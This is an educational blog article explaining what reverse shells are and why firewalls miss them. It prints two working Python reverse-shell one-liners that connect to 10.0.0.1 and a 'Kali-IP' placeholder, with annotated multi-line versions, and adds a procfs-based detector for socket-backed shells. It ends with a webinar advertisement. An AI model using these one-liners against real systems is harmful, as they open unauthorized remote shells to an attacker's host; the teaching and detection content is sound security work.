This article will be fun! You’ll learn about an important concept in security: reverse shells. You’ll also learn how to create reverse shells in Python in a single line of code. So, let’s start with the big question:
What is a Reverse Shell?
Here’s the definition of a Reverse Shell:
A reverse shell is used by attackers to gain access to a target machine. The target machine opens a shell that communicates with the attacking machine. The attacking machine receives the connection (listening on a given port) and is then able to access the target computer. To accomplish a reverse shell, an attacker must first execute code on the target machine. Reverse shells are also used by security engineers to test for and prevent reverse shell attacks.
The reason for a reverse shell is simple: it is often very hard for an attacker to gain access to a target machine because both the target machine itself and the network firewall in front of it carefully block incoming connections. Arguably, this is necessary because attackers from all over the world constantly try to force their way into your machine (if it is reachable from the Internet).
However, it is almost impossible for the same firewalls to protect the client from its own outgoing connections. You could only do so by restricting what the (potential) target is allowed to do. But system administrators and programmers must be able to open ports and communicate with other machines over TCP connections. That is what computers are for, after all.
A reverse shell takes advantage of this and reverses the usual direction of access to a target machine. Now the target opens the connection to the attacker, and firewalls will often allow such outgoing connections on the assumption that the owner of the target machine knows what they are doing.
The only thing the attacker must do is get the target to execute code on its machine that opens a reverse shell and connects back to the attacker’s machine. The attacker opens a port on their own machine and waits for the target to connect to it. Here is the Python one-liner that does this on the target side:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
But you should never execute code that has been copied and pasted from an Internet source. What if the code removes all files from your computer?
Let’s have a look at what this code looks like as a Python multi-liner so that you can understand it better:
import socket, subprocess, os
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  # plain TCP socket
s.connect(("10.0.0.1", 1234))                          # connect out to the listener
os.dup2(s.fileno(), 0)  # stdin  <- socket
os.dup2(s.fileno(), 1)  # stdout -> socket
os.dup2(s.fileno(), 2)  # stderr -> socket
p = subprocess.call(["/bin/sh", "-i"])                 # the interactive shell inherits fds 0-2
A second variant of the one-liner spawns bash through the pty module instead:
python -c 'import pty;import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("Kali-IP",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'
When writing the equivalent multi-liner, the code looks more understandable:
import pty
import socket, os
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("Kali-IP", 443))   # "Kali-IP" is a placeholder for the listener's address
os.dup2(s.fileno(), 0)        # stdin  <- socket
os.dup2(s.fileno(), 1)        # stdout -> socket
os.dup2(s.fileno(), 2)        # stderr -> socket
pty.spawn("/bin/bash")        # bash runs behind a pseudo-terminal; this process relays to the socket
It is very similar to the code above but uses the pty module to spawn the shell behind a pseudo-terminal.
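Both one-liners leave the same footprint on a Linux host: a process whose stdin, stdout and stderr (fds 0, 1, 2) all resolve to a network socket, because that is exactly what the three dup2 calls do. The following detector, added here and not part of the original article, walks /proc and reports such processes; the first variant leaves /bin/sh itself socket-backed, the second leaves the python parent socket-backed while bash sits behind the pty, so both shell and interpreter names are checked. The command-name set and the constructed sample values in the docstrings are assumptions.

```python
import os

# Commands whose fds 0-2 should be a terminal or pipe, never a network
# socket (assumed set). Covers both one-liners above: the first leaves
# /bin/sh socket-backed, the second leaves the python parent socket-backed.
SUSPECT_COMMS = {"sh", "bash", "dash", "zsh", "python", "python2", "python3"}

def std_fds_are_sockets(fds):
    """fds maps fd number -> readlink target of /proc/<pid>/fd/<n>.
    Linux renders a socket descriptor as 'socket:[<inode>]'."""
    return all(fds.get(n, "").startswith("socket:[") for n in (0, 1, 2))

def is_socket_backed_shell(comm, fds):
    """True when a shell or interpreter has stdin, stdout and stderr all
    pointing at sockets: the footprint the three dup2 calls leave behind."""
    return os.path.basename(comm) in SUSPECT_COMMS and std_fds_are_sockets(fds)

def read_fds(pid):
    """Resolve fds 0-2 of a live process via procfs (Linux only)."""
    fds = {}
    for n in (0, 1, 2):
        try:
            fds[n] = os.readlink(f"/proc/{pid}/fd/{n}")
        except OSError:
            pass  # process gone or fd closed; leave it absent
    return fds

def scan_procfs():
    """Return [(pid, comm, socket_target)] for every suspicious process."""
    hits = []
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        try:
            with open(f"/proc/{entry}/comm") as f:
                comm = f.read().strip()
        except OSError:
            continue
        fds = read_fds(entry)
        if is_socket_backed_shell(comm, fds):
            hits.append((int(entry), comm, fds[0]))
    return hits

if __name__ == "__main__":
    for pid, comm, sock in scan_procfs():
        print(f"pid {pid} ({comm}) has stdin/stdout/stderr on {sock}")
```

Reading /proc/<pid>/fd of other users' processes requires root, so run the scan with elevated privileges to cover the whole host; a legitimate daemon with socket-backed fds 0-2 (e.g. one started by a socket activator) would need to be allow-listed.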
Where to Go From Here?
Enough theory, let’s get some practice!
To become successful in coding, you need to get out there and solve real problems for real people. That’s how you can become a six-figure earner easily. And that’s how you polish the skills you really need in practice. After all, what’s the use of learning theory that nobody ever needs?
Practice projects are how you sharpen your saw in coding!
Do you want to become a code master by focusing on practical code projects that actually earn you money and solve problems for people?
Then become a Python freelance developer! It’s the best way of approaching the task of improving your Python skills—even if you are a complete beginner.
Join my free webinar “How to Build Your High-Income Skill Python” and watch how I grew my coding business online and how you can, too—from the comfort of your own home.